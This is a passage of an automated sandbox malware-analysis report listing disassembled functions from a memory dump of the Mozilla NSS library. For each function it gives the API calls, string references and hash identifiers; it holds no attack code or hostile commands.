                                                                                                                                                                                                                            • Part of subcall function 6C48AB10: free.MOZGLUE(0148B805,?,2404110F,?,?), ref: 6C48AB76
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C48DCFA
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00000000), ref: 6C48DD0E
                                                                                                                                                                                                                          • PK11_IsFriendly.NSS3(?), ref: 6C48DD73
                                                                                                                                                                                                                          • PK11_IsLoggedIn.NSS3(?,00000000), ref: 6C48DD8B
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C48DE81
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C48DEA6
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C48DF08
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalSection$Deletefree$K11_$EnterFriendlyLoggedUnlockValuememcpystrlen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 519503562-0
                                                                                                                                                                                                                          • Opcode ID: 645683326e1885176028d8363355449212e70c1d0c082ddff2e501810e8de2b6
                                                                                                                                                                                                                          • Instruction ID: c477bc6eb0bde857e6f873ce927cc66269ff2c27293b168c7154314a734d1f3a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 645683326e1885176028d8363355449212e70c1d0c082ddff2e501810e8de2b6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CB91C1B5A031069FDB00CF68C881FAAB7B1BF44309F15406ADD199BB41EB31E945CBE1
                                                                                                                                                                                                                          Function 6C445FC0 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 230COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,000293F4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,6C52BB62,00000004,6C594CA4,?,?,00000000,?,?,6C4031DB), ref: 6C4460AB
                                                                                                                                                                                                                          • sqlite3_config.NSS3(00000004,6C594CA4,6C52BB62,00000004,6C594CA4,?,?,00000000,?,?,6C4031DB), ref: 6C4460EB
                                                                                                                                                                                                                          • sqlite3_config.NSS3(00000012,6C594CC4,?,?,6C52BB62,00000004,6C594CA4,?,?,00000000,?,?,6C4031DB), ref: 6C446122
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C446095
                                                                                                                                                                                                                          • %s at line %d of [%.10s], xrefs: 6C4460A4
                                                                                                                                                                                                                          • misuse, xrefs: 6C44609F
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: sqlite3_config$sqlite3_log
                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse
                                                                                                                                                                                                                          • API String ID: 1634735548-648709467
                                                                                                                                                                                                                          • Opcode ID: 049c9f86206a4363b9f0bfed3d3d25b7c4c8f3c3e6e160a6e10a200ca2d9d02d
                                                                                                                                                                                                                          • Instruction ID: f19dfd8c2b7f196edfcf9398216481dbf5d158f40870e7b4ac5c2d1c0c82e3c6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 049c9f86206a4363b9f0bfed3d3d25b7c4c8f3c3e6e160a6e10a200ca2d9d02d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C4B13CB4A04A4ACFDB04CF58C641DA9B7F0FB1E305B16815DD509BB322E770AB85CB99
                                                                                                                                                                                                                          Function 6C3F4F60 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 211stringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C3F4FC4
                                                                                                                                                                                                                          • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,0002996C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C3F51BB
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • unable to delete/modify user-function due to active statements, xrefs: 6C3F51DF
                                                                                                                                                                                                                          • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C3F51A5
                                                                                                                                                                                                                          • %s at line %d of [%.10s], xrefs: 6C3F51B4
                                                                                                                                                                                                                          • misuse, xrefs: 6C3F51AF
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: sqlite3_logstrlen
                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify user-function due to active statements
                                                                                                                                                                                                                          • API String ID: 3619038524-4115156624
                                                                                                                                                                                                                          • Opcode ID: 60ae28029dd65691297d2f51aeed834e1572fef1fb538865fad3d7ac7542d472
                                                                                                                                                                                                                          • Instruction ID: d6c9d745711ec3f597a7a815b94d87e3252105d721e74d2a03f44a9d7ac037ca
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 60ae28029dd65691297d2f51aeed834e1572fef1fb538865fad3d7ac7542d472
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D719E7160420A9BEF00CE55CD80BDA77B9BF48318F148924FD299BB41D336E952CFA1
                                                                                                                                                                                                                          Function 6C4DFF10 Relevance: 10.7, APIs: 7, Instructions: 164memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PORT_NewArena_Util.NSS3(00000400,?,?,00000000,00000000,?,6C4DF165,?), ref: 6C4DFF4B
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,-000000F8,?,?,?,00000000,00000000,?,6C4DF165,?), ref: 6C4DFF6F
                                                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,-000000F8,?,?,?,?,?,00000000,00000000,?,6C4DF165,?), ref: 6C4DFF81
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,-000000F8,?,?,?,?,?,00000000,00000000,?,6C4DF165,?), ref: 6C4DFF8D
                                                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,-000000F8,?,?,?,?,?,?,?,00000000,00000000,?,6C4DF165,?), ref: 6C4DFFA3
                                                                                                                                                                                                                          • SEC_ASN1EncodeItem_Util.NSS3(00000000,00000000,6C4DF165,6C5A219C,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C4DFFC8
                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,00000000,00000000,?,6C4DF165,?), ref: 6C4E00A6
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Util$Alloc_ArenaArena_memset$EncodeFreeItem_
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 204871323-0
                                                                                                                                                                                                                          • Opcode ID: 6e01963b8b5a1f770751c9d0298e322bed6b12d63577e84e9eaa07da02fdb99b
                                                                                                                                                                                                                          • Instruction ID: 9d582f45deeca7c388feba0f76b7891f67c551d244e252a8bd9d9f8a19e4a395
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6e01963b8b5a1f770751c9d0298e322bed6b12d63577e84e9eaa07da02fdb99b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2E511371E012559FDB21CE98D890FAEB7B1BB4931AF660229DD65A7B40D731AC008BD1
                                                                                                                                                                                                                          Function 6C49DEF0 Relevance: 10.7, APIs: 7, Instructions: 159COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C49DF37
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C49DF4B
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C49DF96
                                                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6C49E02B
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C49E07E
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C49E090
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C49E0AF
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Error$Unlock$CriticalEnterSectionValue
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4073542275-0
                                                                                                                                                                                                                          • Opcode ID: 9704c4c8a8c6f29bc0e6dcbd896dfe5bc2707d6d71c02a2130f56e40924afd4a
                                                                                                                                                                                                                          • Instruction ID: 429f43923db7f0e27948bcce0a3da69ca4f4eb8277ccffe3ad8dc9af2c8af21a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9704c4c8a8c6f29bc0e6dcbd896dfe5bc2707d6d71c02a2130f56e40924afd4a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3651BD35A00620CFEB20DE24DC85F667BB5BB44319F204528E85A47F91E732E849CBD2
                                                                                                                                                                                                                          Function 6C4BAC10 Relevance: 10.6, APIs: 7, Instructions: 121memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6C4BAB3E,?,?,?), ref: 6C4BAC35
                                                                                                                                                                                                                            • Part of subcall function 6C49CEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6C49CF16
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6C4BAB3E,?,?,?), ref: 6C4BAC55
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
                                                                                                                                                                                                                          • PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6C4BAB3E,?,?), ref: 6C4BAC70
                                                                                                                                                                                                                            • Part of subcall function 6C49E300: TlsGetValue.KERNEL32 ref: 6C49E33C
                                                                                                                                                                                                                            • Part of subcall function 6C49E300: EnterCriticalSection.KERNEL32(?), ref: 6C49E350
                                                                                                                                                                                                                            • Part of subcall function 6C49E300: PR_Unlock.NSS3(?), ref: 6C49E5BC
                                                                                                                                                                                                                            • Part of subcall function 6C49E300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6C49E5CA
                                                                                                                                                                                                                            • Part of subcall function 6C49E300: TlsGetValue.KERNEL32 ref: 6C49E5F2
                                                                                                                                                                                                                            • Part of subcall function 6C49E300: EnterCriticalSection.KERNEL32(?), ref: 6C49E606
                                                                                                                                                                                                                            • Part of subcall function 6C49E300: PORT_Alloc_Util.NSS3(?), ref: 6C49E613
                                                                                                                                                                                                                          • PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6C4BAC92
                                                                                                                                                                                                                          • PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6C4BAB3E), ref: 6C4BACD7
                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(?), ref: 6C4BAD10
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6C4BAD2B
                                                                                                                                                                                                                            • Part of subcall function 6C49F360: TlsGetValue.KERNEL32(00000000,?,6C4BA904,?), ref: 6C49F38B
                                                                                                                                                                                                                            • Part of subcall function 6C49F360: EnterCriticalSection.KERNEL32(?,?,?,6C4BA904,?), ref: 6C49F3A0
                                                                                                                                                                                                                            • Part of subcall function 6C49F360: PR_Unlock.NSS3(?,?,?,?,6C4BA904,?), ref: 6C49F3D3
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2926855110-0
                                                                                                                                                                                                                          • Opcode ID: 82241a5dca83bb2d683eb1d19acc12e52411a5db0dd0de307b3f2219535ac007
                                                                                                                                                                                                                          • Instruction ID: e5c3672a96360c1ee85c41b8b9d198667f4bc5e18be6a721e9f53991e0af4443
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 82241a5dca83bb2d683eb1d19acc12e52411a5db0dd0de307b3f2219535ac007
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 893126B1E006155FEB00DE698C40DAF7B76AF84328B19812CE819AB740EB31AD0597F1
                                                                                                                                                                                                                          Function 6C498C70 Relevance: 10.6, APIs: 7, Instructions: 110stringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PR_Now.NSS3 ref: 6C498C7C
                                                                                                                                                                                                                            • Part of subcall function 6C539DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C580A27), ref: 6C539DC6
                                                                                                                                                                                                                            • Part of subcall function 6C539DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C580A27), ref: 6C539DD1
                                                                                                                                                                                                                            • Part of subcall function 6C539DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C539DED
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C498CB0
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C498CD1
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C498CE5
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C498D2E
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE00F,00000000), ref: 6C498D62
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C498D93
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3131193014-0
                                                                                                                                                                                                                          • Opcode ID: 90082df8ded69e48e751f6394466a5436d4a4a28ff14d51e3d1da299b0d88b61
                                                                                                                                                                                                                          • Instruction ID: cba4450bdd4d825cd769908b14c79650ad8be9e97cf332eeb2196fff2715c3c4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 90082df8ded69e48e751f6394466a5436d4a4a28ff14d51e3d1da299b0d88b61
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE313771A01221ABE700DF68DC44FAABB70BF55318F24023AEA1967B60D771B954C7C1
                                                                                                                                                                                                                          Function 6C4D9D60 Relevance: 10.6, APIs: 7, Instructions: 108memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PORT_ArenaMark_Util.NSS3(?,00000000,?,?,00000000,?,6C4D9C5B), ref: 6C4D9D82
                                                                                                                                                                                                                            • Part of subcall function 6C4D14C0: TlsGetValue.KERNEL32 ref: 6C4D14E0
                                                                                                                                                                                                                            • Part of subcall function 6C4D14C0: EnterCriticalSection.KERNEL32 ref: 6C4D14F5
                                                                                                                                                                                                                            • Part of subcall function 6C4D14C0: PR_Unlock.NSS3 ref: 6C4D150D
                                                                                                                                                                                                                          • PORT_ArenaGrow_Util.NSS3(?,?,00000000,?,6C4D9C5B), ref: 6C4D9DA9
                                                                                                                                                                                                                            • Part of subcall function 6C4D1340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6C47895A,00000000,?,00000000,?,00000000,?,00000000,?,6C46F599,?,00000000), ref: 6C4D136A
                                                                                                                                                                                                                            • Part of subcall function 6C4D1340: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6C47895A,00000000,?,00000000,?,00000000,?,00000000,?,6C46F599,?,00000000), ref: 6C4D137E
                                                                                                                                                                                                                            • Part of subcall function 6C4D1340: PL_ArenaGrow.NSS3(?,6C46F599,?,00000000,?,6C47895A,00000000,?,00000000,?,00000000,?,00000000,?,6C46F599,?), ref: 6C4D13CF
                                                                                                                                                                                                                            • Part of subcall function 6C4D1340: PR_Unlock.NSS3(?,?,6C47895A,00000000,?,00000000,?,00000000,?,00000000,?,6C46F599,?,00000000), ref: 6C4D145C
                                                                                                                                                                                                                          • PORT_ArenaGrow_Util.NSS3(?,?,?,?,?,?,?,?,6C4D9C5B), ref: 6C4D9DCE
                                                                                                                                                                                                                            • Part of subcall function 6C4D1340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6C47895A,00000000,?,00000000,?,00000000,?,00000000,?,6C46F599,?,00000000), ref: 6C4D13F0
                                                                                                                                                                                                                            • Part of subcall function 6C4D1340: PL_ArenaGrow.NSS3(?,6C46F599,?,?,?,00000000,00000000,?,6C47895A,00000000,?,00000000,?,00000000,?,00000000), ref: 6C4D1445
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000008,6C4D9C5B), ref: 6C4D9DDC
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,6C4D9C5B), ref: 6C4D9DFE
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,6C4D9C5B), ref: 6C4D9E43
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,6C4D9C5B), ref: 6C4D9E91
                                                                                                                                                                                                                            • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                            • Part of subcall function 6C4D1560: TlsGetValue.KERNEL32(00000000,00000000,?,?,?,6C4CFAAB,00000000), ref: 6C4D157E
                                                                                                                                                                                                                            • Part of subcall function 6C4D1560: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6C4CFAAB,00000000), ref: 6C4D1592
                                                                                                                                                                                                                            • Part of subcall function 6C4D1560: memset.VCRUNTIME140(?,00000000,?), ref: 6C4D1600
                                                                                                                                                                                                                            • Part of subcall function 6C4D1560: PL_ArenaRelease.NSS3(?,?), ref: 6C4D1620
                                                                                                                                                                                                                            • Part of subcall function 6C4D1560: PR_Unlock.NSS3(?), ref: 6C4D1639
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Arena$Util$Value$Alloc_CriticalEnterSectionUnlock$GrowGrow_$ErrorMark_Releasememset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3425318038-0
                                                                                                                                                                                                                          • Opcode ID: ec09ca6b5ba00fa30881863b7796f78fa7ddeeb76bf669e4abd50a1f8de51863
                                                                                                                                                                                                                          • Instruction ID: 4249a386122c0e3bff33582ebc2076fae071e19c48697e2a3ba946ac015d321d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ec09ca6b5ba00fa30881863b7796f78fa7ddeeb76bf669e4abd50a1f8de51863
